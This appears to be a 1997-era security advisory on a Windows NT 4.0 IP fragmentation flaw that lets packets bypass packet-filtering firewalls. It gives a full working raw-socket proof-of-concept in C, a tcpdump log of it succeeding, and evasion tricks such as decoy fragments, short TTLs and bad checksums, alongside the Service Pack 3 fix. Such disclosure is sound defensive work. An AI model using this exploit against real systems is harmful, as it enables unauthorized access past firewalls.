COMMAND

    fragmentation attack

SYSTEMS AFFECTED

    Win NT 4.0

PROBLEM

    Thomas Lopatic found the following.  Windows NT 4.0 (up to Service
    Pack 2) hosts which are protected by a packet filtering firewall
    are vulnerable to a new kind of fragmentation attack.  Details are
    taken from http://www.dataprotect.com/ntfrag/

    The  attack  affects  Windows  NT  4.0  hosts (up to and including
    Service Pack 2)  that are protected  by a firewall  which is based
    on packet screening.  Stateful inspection firewalls may also be
    affected, depending on their implementation.  Using this
    weakness, an  outsider is  able to  pass IP  datagrams through the
    firewall to the Windows  NT host, i.e. access  the host as if  the
    firewall did not exist.

    When  reassembling   a  fragmented   IP  packet,   the   Microsoft
    implementation  does  not  require  the  first fragment to have an
    offset value of zero.  It merely checks whether the sum of the
    lengths of the collected fragments equals the total length of  the
    original unfragmented  IP packet.  If enough  fragments have  been
    received so that this condition  holds, the NT stack will  happily
    reassemble what it has got so far.

    So -  how does  it know  about the  total length  of the  original
    packet?   Since, during  normal operation,  all fragments  but the
    last  have  the  MF  (more  fragments)  bit set, Microsoft's stack
    waits until it has  received a fragment F  without the MF bit  and
    then reasons  that the  length of  the unfragmented  datagram must
    have been  offset of  F +  length of  F. Apparently Microsoft have
    tried to  be particularly  efficient since  this method  is faster
    than  traversing  the  whole  list  of  fragments  to  check   for
    completeness.

    Thomas illustrated  this mechanism  with an  example. Say  that we
    have  an  original  packet  of  48  bytes  which  we send as three
    fragments F1,  F2 and  F3, each  with a  length of  16 bytes.  Now
    suppose  that  they  arrive  out  of  order, first F2, then F3 and
    eventually  F1.   The  following  table  shows  NT's notion of the
    total packet length after each fragment has arrived.

    Fragment  Offset  Length  MF bit  Total Length                      Data Collected

    F2        16      16      1       0  (no change, since MF = 1)      16
    F3        32      16      0       48 (= offset + length = 32 + 16)  32
    F1        0       16      1       48 (no change, since MF = 1)      48

    Once Total Length equals Data Collected, the IP stack decides
    that it has received all fragments and starts reassembling.  To
    exploit this goodie courtesy of Microsoft, we clear the MF bit on
    a fragment other than the last one.  Suppose we send two new
    fragments, F1 and F2, as follows.

    Fragment  Offset  Length  MF bit  Total Length                      Data Collected

    F1        16      16      0       32 (= offset + length = 16 + 16)  16
    F2        32      16      1       32 (no change, since MF = 1)      32

    We have just sent two fragments, neither of which has an offset of
    zero, yet the NT protocol stack will reassemble them into a 32 byte
    IP packet.
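
    The bookkeeping described above can be modelled in a few lines of
    C.  This is only a sketch of the behaviour as the advisory
    describes it, not Microsoft's code; the struct and function names
    are made up for illustration.  replay_attack() feeds in the two
    fragments from the second table.

```c
#include <assert.h>
#include <stdio.h>

/* Hypothetical model of one reassembly queue; names are illustrative. */
struct reasm {
    unsigned total_len;  /* 0 until a fragment with MF = 0 has arrived */
    unsigned collected;  /* sum of fragment lengths received so far */
};

/* Feed one fragment; returns 1 when the flawed check would reassemble. */
static int add_fragment(struct reasm *q, unsigned offset, unsigned len, int mf)
{
    assert(len > 0);
    if (!mf)
        q->total_len = offset + len;   /* fragment without MF fixes the total */
    q->collected += len;
    /* Flaw: nothing here tests that a fragment with offset 0 was seen. */
    return q->total_len != 0 && q->collected == q->total_len;
}

/* Replays the second table: offsets 16 and 32, no zero-offset fragment. */
static int replay_attack(void)
{
    struct reasm q = {0, 0};
    int done;

    done = add_fragment(&q, 16, 16, 0);
    printf("F1: total=%u collected=%u done=%d\n", q.total_len, q.collected, done);
    done = add_fragment(&q, 32, 16, 1);
    printf("F2: total=%u collected=%u done=%d\n", q.total_len, q.collected, done);
    return done;
}
```

    In this model the check fires after the second fragment even
    though bytes 0 to 15 were never received.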

    Exploiting this feature is a bit more complicated than it seems at
    first  sight.  Since  the  IP  stack  stores  the  IP  header of a
    fragment (to use it later for the reassembled packet) if and  only
    if its offset is  zero, we must send  a decoy packet first,  which
    must be  carefully crafted  so that  it will  be stored at exactly
    the  same  memory  location  as  our  next  packet,  which  is the
    malicious  one  without  the  zero-offset-fragment.  So, the bogus
    datagram will reuse the header information of our first datagram.

    Imagine  that  we  would  like  to  attack  a  WWW server behind a
    firewall.  Then we  would send one decoy  to port 80, a  malicious
    packet to 23,  another decoy to  port 80, another  bogus packet to
    port  23,  etc.  In  this  way  we  can establish a telnet session
    through the packet screen.

    But what do we do when we hit a packet screen (e.g. screend) which
    requires every fragmented packet to include a fragment with an
    offset of zero?  We send such a fragment and simply give it a
    time  to  live  that  is  short  enough  so that it will reach the
    firewall but never the  destination host. Another option  would be
    to insert an invalid checksum into  its IP header so that it  will
    be dropped at the destination host.
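
    The invalid-checksum option works because a receiver discards any
    IP header whose checksum does not verify.  The sketch below shows
    that test for a 20-byte header held as ten 16-bit words, using the
    usual one's-complement sum.  The helper names are hypothetical and
    the header words are treated as opaque values.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* One's-complement sum over 16-bit words, folded back to 16 bits. */
static uint16_t ones_sum(const uint16_t *words, size_t nwords)
{
    uint32_t sum = 0;

    assert(words != NULL);
    while (nwords--)
        sum += *words++;
    sum = (sum >> 16) + (sum & 0xffff);
    sum = (sum >> 16) + (sum & 0xffff);
    return (uint16_t)sum;
}

/* Hypothetical helper: store a valid checksum in word 5 of the header. */
static void set_checksum(uint16_t hdr[10])
{
    hdr[5] = 0;
    hdr[5] = (uint16_t)~ones_sum(hdr, 10);
}

/* A receiver accepts the header only if all ten words sum to 0xffff. */
static int header_ok(const uint16_t hdr[10])
{
    return ones_sum(hdr, 10) == 0xffff;
}
```

    Flipping any bit of the stored checksum after set_checksum() makes
    header_ok() return 0, which is the condition under which the
    destination host drops the fragment.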

    In order to back up the  above theory with an example, Thomas  has
    written a short program which  sends a decoy UDP datagram  to port
    9 (discard) of his NT  system and after that another  UDP datagram
    to  port  7  (echo).   He  used  port  255 as the source port. The
    program runs on  NetBSD 1.2 and  should be easily  portable to any
    BSD  system  featuring  the  Berkeley  Packet  Filter. Here is the
    output of tcpdump after an example run.

    bob:/usr/home/tl# tcpdump
    tcpdump: listening on ed0
    01:54:38.751853 bob.255 > alice.discard: udp 248 (frag 256:256@0+)
    01:54:38.752252 bob > alice: (frag 256:256@256)
    01:54:38.752645 bob > alice: (frag 512:256@256)
    01:54:38.753054 bob > alice: (frag 512:256@512+)
    01:54:38.755716 alice.echo > bob.255: udp 248
    01:54:38.755992 bob > alice: icmp: bob udp port 255 unreachable
    ^C
    6 packets received by filter
    0 packets dropped by kernel
    bob:/usr/home/tl#

    As can be easily seen, alice responds (line seven in the above
    listing) to the two fragments sent by bob (lines five and six
    in the above listing). The first two fragments (lines three and
    four) make  up the  decoy packet.  Eventually, alice  gets an ICMP
    message, since  bob does  not have  any service  listening at port
    255.  The  source code for  this little demo  program is available
    below.

    /*
       This program demonstrates a new kind of fragmentation attack
       involving Windows NT 4.0  hosts behind packet filtering  firewalls.
       See http://www.dataprotect.com/ntfrag/ for details on this attack.

       It should compile cleanly on any BSD system which has the  Berkeley
       Packet Filter installed and has  been tested on NetBSD 1.2  against
       a Windows NT 4.0 (SP2) host.

       OpenBSD patches provided by Theo de Raadt <deraadt@cvs.openbsd.org>

       SERVICE PACK 3 FIXES THIS PROBLEM! INSTALL IT - NOW!

       Thomas Lopatic (thomas@dataprotect.com), 970709
    */

    #include <sys/types.h>
    #include <netinet/in_systm.h>
    #include <netinet/in.h>
    #include <netinet/ip.h>
    #include <netinet/ip_icmp.h>
    #include <netinet/udp.h>
    #include <sys/socket.h>
    #include <sys/time.h>
    #include <sys/errno.h>
    #include <fcntl.h>
    #include <sys/ioctl.h>
    #include <net/bpf.h>
    #include <net/if.h>
    #include <stdlib.h>
    #include <stdio.h>
    #include <arpa/inet.h>
    #include <string.h>
    #include <unistd.h>

    char bpf_dev[] = "/dev/bpf1";   /* the BPF device to use */
    char inter[] = "ed0";           /* the ethernet device we'll attach to */
    char src[] = "172.16.0.2";      /* our address */
    char dest[] = "172.16.0.1";     /* the target system's address */
    int sport = 255;                /* the source port for the UDP datagram */
    int dport = 9;                  /* the decoy destination port */
    int real_dport = 7;             /* the real destination port */

    u_short calc_sum(u_short start, u_short *buff, int len)
    {
      u_long sum = start;

      while (len--)
	sum += *buff++;

      sum = (sum >> 16) + (sum & 0xffff);
      sum = (sum >> 16) + (sum & 0xffff);

      return sum;
    }

    void dump_hex(u_char *buffer, int size)
    {
      int i, off = 0;

      while (off < size) {
	printf("%.4x:", off);
	for (i = 0; i < 16 && i + off < size; i++)
	  printf(" %.2x", buffer[i + off]);
	printf("\n");
	off += i;
      }
    }

    int main(int ac, char *av[])
    {
      int i, s, k, bpf, res = 0, true = 1;
      unsigned char dgram[276];
      union {
	unsigned long l[3];
	unsigned short s[6];
	unsigned char c[12];
      } pseudo;
      struct ip *iph;
      struct udphdr *udph;
      struct sockaddr_in daddr;
      struct timeval to = {0, 500000};
      int blen;
      u_char *bbuff;
      struct ifreq req;
      struct bpf_hdr *bhdr;

      if (getuid()) {
	printf("you must be root to use this program\n");
	return 12;
      }

      if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
	perror("socket");
	res = 1;
      } else {
	if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &true, sizeof(true)) < 0) {
	  perror("setsockopt");
	  res = 2;
	} else if ((bpf = open(bpf_dev, O_RDWR)) < 0) {
	  perror("open");
	  res = 3;
	} else {
	  if (ioctl(bpf, BIOCGBLEN, &blen) < 0) {
	    perror("ioctl(BIOCGBLEN)");
	    res = 4;
	  } else if ((bbuff = malloc(blen)) == NULL) {
	    perror("malloc");
	    res = 5;
	  } else {
	    strcpy(req.ifr_name, inter);
	    if (ioctl(bpf, BIOCSETIF, &req) < 0) {
	      perror("ioctl(BIOCSETIF)");
	      res = 6;
	    } else if (ioctl(bpf, BIOCSRTIMEOUT, &to) < 0) {
	      perror("ioctl(BIOCSRTIMEOUT)");
	      res = 7;
	    } else {
	      daddr.sin_len = sizeof(daddr);
	      daddr.sin_family = AF_INET;
	      daddr.sin_port = dport;
	      daddr.sin_addr.s_addr = inet_addr(dest);

	      for (i = 0; i < sizeof(dgram); dgram[i++] = 0);
	      for (i = 0; i < 3; pseudo.l[i++] = 0);

	      iph = (struct ip *)&dgram[0];
	      udph = (struct udphdr *)&dgram[20];

	      iph->ip_v = IPVERSION;
	      iph->ip_hl = 5;
    #ifdef __OpenBSD__
	      iph->ip_len = htons(276);
    #else
	      iph->ip_len = 276;
    #endif
	      iph->ip_id = 1;
	      iph->ip_ttl = 255;
	      iph->ip_p = pseudo.c[9] = IPPROTO_UDP;
	      iph->ip_src.s_addr = pseudo.l[0] = inet_addr(src);
	      iph->ip_dst.s_addr = pseudo.l[1] = inet_addr(dest);

	      /*
		 offset = 0, length = 256, MF = 1
		 -> total length is not affected by this fragment
	      */

    #ifdef __OpenBSD__
	      iph->ip_off = htons(0x2000);
    #else
	      iph->ip_off = 0x2000;
    #endif
	      iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);

	      udph->uh_sport = htons(sport);
	      udph->uh_dport = htons(dport);
	      udph->uh_ulen = pseudo.s[5] = htons(256);
	      udph->uh_sum = ~calc_sum(calc_sum(0, pseudo.s, 6), (u_short *)udph,128);

	      /* send the first half of the decoy */

	      if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
			 sizeof(daddr)) < 0) {
		perror("sendto");
		res = 8;
	      }

	      /*
		offset = 256, length = 256, MF = 0
		 -> total length is set to 512 by this fragment
	      */

    #ifdef __OpenBSD__
	      iph->ip_off = htons(32);
    #else
	      iph->ip_off = 32;
    #endif
	      iph->ip_sum = 0;
	      iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);
	      for (i = 20; i < 276; dgram[i++] = 0);

	      /* send the second half of the decoy */

	      if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
			 sizeof(daddr)) < 0) {
		perror("sendto");
		res = 9;
	      }

	      iph->ip_id++;
	      iph->ip_sum = 0;
	      iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);

	      udph->uh_sport = htons(sport);
	      udph->uh_dport = htons(real_dport);
	      udph->uh_ulen = pseudo.s[5] = htons(256);
	      udph->uh_sum = ~calc_sum(calc_sum(0, pseudo.s, 6), (u_short *)udph,128);

	      /*
		 send the first half of the real datagram
		 we have kept the offset settings from above
		 offset = 256, length = 256, MF = 0
		 -> total length is set to 512 by this fragment
	      */

	      if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
			 sizeof(daddr)) < 0) {
		perror("sendto");
		res = 10;
	      }

	      /*
		 offset = 512, length = 256, MF = 1
		 -> total length is not affected
	      */

    #ifdef __OpenBSD__
	      iph->ip_off = htons(0x2040);
    #else
	      iph->ip_off = 0x2040;
    #endif
	      iph->ip_sum = 0;
	      iph->ip_sum = ~calc_sum(0, (u_short *)iph, 10);
	      for (i = 20; i < 276; dgram[i++] = 0);

	      /* send the second half of the real datagram */

	      if (sendto(s, &dgram, 276, 0, (struct sockaddr *)&daddr,
			 sizeof(daddr)) < 0) {
		perror("sendto");
		res = 11;
	      }
	    }
	    free(bbuff);
	  }
	  close(bpf);
	}
	close(s);
      }
      return res;
    }
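
    The ip_off values used in the program above (0x2000, 32 and
    0x2040) pack the MF flag and the fragment offset into one 16-bit
    field: bit 0x2000 is MF and the low 13 bits hold the offset in
    units of 8 bytes.  The helpers below are a small sketch for
    decoding and building such values in host byte order; the macro
    and function names are made up for this example.

```c
#include <assert.h>
#include <stdint.h>

#define FRAG_MF      0x2000u  /* "more fragments" flag */
#define FRAG_OFFMASK 0x1fffu  /* fragment offset, in units of 8 bytes */

/* Byte offset encoded in a host-order ip_off value. */
static unsigned frag_byte_offset(uint16_t ip_off)
{
    return (unsigned)(ip_off & FRAG_OFFMASK) * 8u;
}

/* 1 if the MF bit is set, 0 otherwise. */
static int frag_more(uint16_t ip_off)
{
    return (ip_off & FRAG_MF) != 0;
}

/* Hypothetical helper: build ip_off from a byte offset and an MF flag. */
static uint16_t frag_make(unsigned byte_offset, int mf)
{
    assert(byte_offset % 8 == 0 && byte_offset / 8 <= FRAG_OFFMASK);
    return (uint16_t)((byte_offset / 8) | (mf ? FRAG_MF : 0u));
}
```

    With these, frag_make(0, 1) gives 0x2000, frag_make(256, 0) gives
    32 and frag_make(512, 1) gives 0x2040, matching the four fragments
    shown in the tcpdump output (256@0+, 256@256, 256@256, 256@512+).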

SOLUTION

    This problem has been fixed in Service Pack 3 (SP3), which introduces
    a check that the IP stack has seen a fragment with an offset of zero
    before reassembly is done.
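
    The advisory does not say how SP3 implements this check.  As a
    rough sketch only, the length-based completeness test could be
    extended with a flag that records whether a zero-offset fragment
    has arrived.  All names below are hypothetical.

```c
#include <assert.h>

/* Hypothetical model of a reassembly queue with the additional check. */
struct reasm_fixed {
    unsigned total_len;   /* 0 until a fragment with MF = 0 arrives */
    unsigned collected;   /* sum of fragment lengths received so far */
    int seen_first;       /* set once a fragment with offset 0 arrives */
};

/* Feed one fragment; returns 1 only when reassembly may start. */
static int add_fragment_fixed(struct reasm_fixed *q, unsigned offset,
                              unsigned len, int mf)
{
    assert(len > 0);
    if (offset == 0)
        q->seen_first = 1;
    if (!mf)
        q->total_len = offset + len;
    q->collected += len;
    /* Lengths must match AND the zero-offset fragment must be present. */
    return q->seen_first && q->total_len != 0 &&
           q->collected == q->total_len;
}
```

    With this extra condition the two-fragment sequence at offsets 16
    and 32 never completes, while the ordinary out-of-order sequence
    F2, F3, F1 still does.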